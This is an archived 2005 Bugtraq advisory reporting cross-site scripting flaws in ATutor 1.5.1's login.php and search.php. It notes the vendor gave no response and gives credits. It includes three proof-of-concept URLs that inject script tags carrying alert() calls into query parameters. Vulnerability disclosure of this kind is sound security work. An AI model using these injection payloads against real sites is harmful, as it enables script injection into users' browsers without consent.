| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 18 Aug 2005 21:25:27 -0000
From: h4cky0u@...il.com
To: bugtraq@...urityfocus.com
Subject: ATutor 1.5.1 and prior multiple XSS Vulnerabilities
ATutor 1.5.1 and prior multiple XSS Vulnerabilities
SEVERITY:
=========
Medium
SOFTWARE:
=========
ATutor 1.5.1
http://www.atutor.ca/
INFO:
=====
ATutor 1.5.1 is a web based education portal.
DESCRIPTION:
============
The system is vulnerable to various XSS attacks:
--==XSS==--
Some examples -
http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>
http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages
http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search
VENDOR STATUS:
==============
Vendor was contacted but no response received till date.
CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!
ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2094
Powered by blists - more mailing lists